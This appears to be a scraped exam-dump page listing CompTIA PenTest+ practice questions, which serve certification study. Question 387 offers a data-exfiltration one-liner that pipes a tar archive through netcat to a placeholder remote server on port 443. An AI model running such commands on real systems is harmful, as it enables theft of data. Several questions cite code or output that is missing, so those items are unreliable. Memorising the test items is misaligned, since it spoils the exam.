PT0-003 Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :404 Q&As
  • Last Updated
    :Jun 01, 2026

CompTIA PT0-003 Online Questions & Answers

  • Question 381:

    A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011.

    Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

    A. Nmap
    B. tcpdump
    C. Scapy
    D. hping3

  • Question 382:

    During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:

    Which of the following best describes what the tester plans to do by executing the command?

    A. The tester plans to perform the first step to execute a Golden Ticket attack to compromise the Active Directory domain.
    B. The tester plans to collect application passwords or hashes to compromise confidential information within the local computer.
    C. The tester plans to use the hash collected to perform lateral movement to other computers using a local administrator hash.
    D. The tester plans to collect the ticket information from the user to perform a Kerberoasting attack on the domain controller.

  • Question 383:

    The following PowerShell snippet was extracted from a log of an attacker machine:

    A penetration tester would like to identify the presence of an array.

    Which of the following line numbers would define the array?

    A. Line 8
    B. Line 13
    C. Line 19
    D. Line 20

  • Question 384:

    A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.

    Which of the following changes should the tester apply to make the script work as intended?

    A. Change line 2 to $ip= 10.192.168.254;
    B. Remove lines 3, 5, and 6.
    C. Remove line 6.
    D. Move all the lines below line 7 to the top of the script.

  • Question 385:

    A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

    Pre-engagement interaction (scoping and ROE) Intelligence gathering (reconnaissance) Threat modeling Vulnerability analysis Exploitation and post exploitation Reporting

    Which of the following methodologies does the client use?

    A. OWASP Web Security Testing Guide
    B. PTES technical guidelines
    C. NIST SP 800-115
    D. OSSTMM

  • Question 386:

    During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption.

    Which of the following attacks would accomplish this objective?

    A. ChopChop
    B. Replay
    C. Initialization vector
    D. KRACK

  • Question 387:

    A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:

    Action | SRC

    | DEST

    | --

    Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP

    Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCP

    Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCP Block | . | . | *

    Which of the following commands should the tester try next?

    A. tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
    B. gzip /path/to/data && cp data.gz <remote_server> 443
    C. gzip /path/to/data && nc -nvlk 443; cat data.gz ' nc -w 3 <remote_server> 22
    D. tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>

  • Question 388:

    A penetration tester is performing an assessment for an organization and must gather valid user credentials.

    Which of the following attacks would be best for the tester to use to achieve this objective?

    A. Wardriving
    B. Captive portal
    C. Deauthentication
    D. Impersonation

  • Question 389:

    Given the following output:

    User-agent:*

    Disallow: /author/

    Disallow: /xmlrpc.php

    Disallow: /wp-admin

    Disallow: /page/

    During which of the following activities was this output MOST likely obtained?

    A. Website scraping
    B. Website cloning
    C. Domain enumeration
    D. URL enumeration

  • Question 390:

    A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization.

    Which of the following should the penetration tester do to address this issue?

    A. Restore the configuration.
    B. Perform a BIA.
    C. Follow the escalation process.
    D. Select the target.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.